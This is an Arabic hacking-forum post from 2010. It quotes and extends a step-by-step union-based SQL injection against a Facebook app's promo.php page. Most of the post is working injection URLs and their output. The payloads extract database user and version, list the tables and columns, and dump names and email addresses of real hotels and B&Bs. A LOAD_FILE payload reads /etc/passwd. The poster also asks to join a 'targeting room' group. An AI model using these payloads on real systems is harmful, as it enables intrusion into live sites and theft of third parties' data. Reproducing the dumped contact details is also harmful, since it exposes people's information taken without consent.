عرض مشاركة واحدة
قديم 08-10-2010, 01:19 PM   رقم المشاركة : 311 (permalink)
معلومات العضو
kanvi
 
الصورة الرمزية kanvi
 

 

 
إحصائية العضو





kanvi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kanvi is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة king dragons
[align=center]
السلام عليكم

هلا بيكم

ثغرة الــ facebook

صورة للحقنة




الاستغلال


لازم اتحطو اخر الحقنة --


http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,version%28%29,user%28%29,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32----




http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,group_concat%28table_name,0x3a,column_name, 0x3a,table_schema%29,7,8,9,10,11,12,13,group_conca t%28table_name,0x3a,column_name,0x3a,table_schema% 29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32+from+information_schema.columns+where+colum n_name+LIKE+char%2837,%20112,%2097,%20115,%20115,% 2037%29----


http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,group_concat(table_name,0x3a,column_name,0x 3a,table_schema),7,8,9,10,11,12,13,group_concat(ta ble_name,0x3a,column_name,0x3a,table_schema),15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+f rom+information_schema.columns+where+column_name+L IKE+CHAR(37,%20117,%20115,%20101,%20114,%20110,%20 97,%20109,%20101,%2037)--)--
[/align]





الي يعرف ايكمل مايبخل علينا


شكرا لك اخي وهذا متوصلت اليه :
معلمومات على الموقع:


كود PHP:
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 
root@localhost : facebook : 5.1.37-1ubuntu5.4

LIST TABLES


كود PHP:
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,group_concat(table_schema,0x3a,table_name),7,8,9,10,11,12,13,group_concat(table_schema,0x3a,table_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61-- 

كود PHP:
facebook:accommodation,
        
facebook:addcode,
        
facebook:adventplace,
        
facebook:answers,
        
facebook:bookings,
        
facebook:bulletin,
        
facebook:cat_child,
        
facebook:categories,
        
facebook:collage,
        
facebook:collagealbums,
        
facebook:country,
        
facebook:edm,
        
facebook:eventboard,
        
facebook:eventbuddies,
        
facebook:eventcomments,
        
facebook:eventcomments1,facebook:eventmonth,
        
facebook:fbstream,
        
facebook:forums,
        
facebook:forums1,
        
facebook:friends,
        
facebook:friends2,
        
facebook:funquiz,
        
facebook:gb_checkins,
        
facebook:guestbook,
        
facebook:hotstickers,
        
facebook:hotstickers1,
        
facebook:isocode,
        
facebook:location,
        
facebook:loungebuddies,
        
facebook:market_*****s,
        
facebook:marketplace,
        
facebook:mylounge,
        
facebook:mymap,
        
facebook:mystickers,
        
facebook:mytasks,
        
facebook:parentevent,
        
facebook:photocache,
        
facebook:place,
        
facebook:place1,
        
facebook:placeboard,
        
facebook:placeboardusers,
        
facebook:poll_cache,
        
facebook:poll_groups,
        
facebook:poll_options,
        
facebook:poll_options1,
        
facebook:poll_profile,
        
facebook:poll_users,
        
facebook:polls,
        
facebook:polls1,
        
facebook:popularplace,
        
facebook:post_photos,
        
facebook:postca 
LIST COLUMNS

كود PHP:
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,group_concat(table_schema,0x3a,table_name,0x3a,column_name),7,8,9,10,11,12,13,group_concat(table_schema,0x3a,table_name,0x3a,column_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61-- 

كود PHP:
facebook:accommodation:id,
        
facebook:accommodation:name,
        
facebook:accommodation:url,
        
facebook:accommodation:locationId,
        
facebook:accommodation:a_lat,
        
facebook:accommodation:a_long,
        
facebook:accommodation:type,
        
facebook:accommodation:value,
        
facebook:accommodation:valueCount,
        
facebook:accommodation:description,
        
facebook:accommodation:currency,
        
facebook:accommodation:price_min,
        
facebook:accommodation:price_max,
        
facebook:accommodation:standard_price_min,
        
facebook:accommodation:standard_price_max,
        
facebook:accommodation:address,
        
facebook:accommodation:email,
        
facebook:accommodation:img_url,
        
facebook:accommodation:def_img,
        
facebook:accommodation:saved,
        
facebook:addcode:tbid,
        
facebook:addcode:userid,
        
facebook:addcode:code,
        
facebook:addcode:app,
        
facebook:addcode:install,
        
facebook:addcode:timestamp,
        
facebook:addcode:lastlogin,f
        acebook
:adventplace:placeid,
        
facebook:adventplace:adventplaceid,
        
facebook:adventplace:total,
        
facebook:answers:seq,f
        acebook
:answers:uid,
        
facebook:answers:qid,
        
facebook:answers:ans,
        
facebook:answers:seconds,
        
facebook:answers:points 
هذه الحقنة النهائية :

كود PHP:
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(id,0x3a,name,0x3a,email),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+accommodation-- 
كود PHP:
1:Cheriton House:info@cheritonhouse.co.uk,
        
20997:Highways House:reservations@highwayshouse.co.uk,
        
5:B&B San Benedetto:info@bb-sanbenedetto.it,
        
13:HOTEL DELL'ARTE:HotelArte@hotmail.it,
        35:Hotel Meridiana:albergo.meridiana@tiscali.it,
        39:Agriturismo Ardene:info@agriturismoardene.it,
        41:Alexander Bed&Breakfast:info@alexanderbb.it,
        48:Casavacanza Vaticano:info@casavacanzavaticano.it,
        50:Alla Settima Luna:,
        60:Maison Genevois 3:info@maisongenevois3.com,
        61:Caterina a San Pietro B&B:,
        77:Gladiator Rooms:,
        80:B&B Svevo e Joyce:svevo.joyce@libero.it,
        82:The Paggino farm holidays:paggino@tuscanyexperience.net,
        95:Suite Manzoni:info@suitemanzoni.it,
        102:La Canonica di Fungaia:claudianatalucci@tiscali.it,
        105:Hotel Milazzo Roma:info@hotelmilazzo.com,
        118:Agriturismo Allevamento Renaccino:allevamentorenaccino@yahoo.it,
        120:B&B Campo de' 
Fiori:info@bbcampodefiori.com,125:Agriturismo Marciano:staff@agriturismomarciano.it,
        
136:BUENAVISTA:info@buenavista-bandb.it,
        
146:Borgo di Torri:,152:IDEAL:info@idealbandb.com,
        
156:Ricordi di Roma:info@ricord 
وهذا
magic_ qiotes


كود PHP:
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 
التوقيع

...|""""""""""""""""""""""""""""|\|_
...|<<< k4nvi
>>>|||"|""\___-
...| ________________ __ _|||_|____|)


...!(@)'(@)""""******!(@)(@)*****!(@)""

انا حابب اشترك باحد الجروبات الخاصة بغرفة الاستهداف
Email:
__0@hotmail.sg

 


التعديل الأخير تم بواسطة kanvi ; 08-10-2010 الساعة 01:24 PM.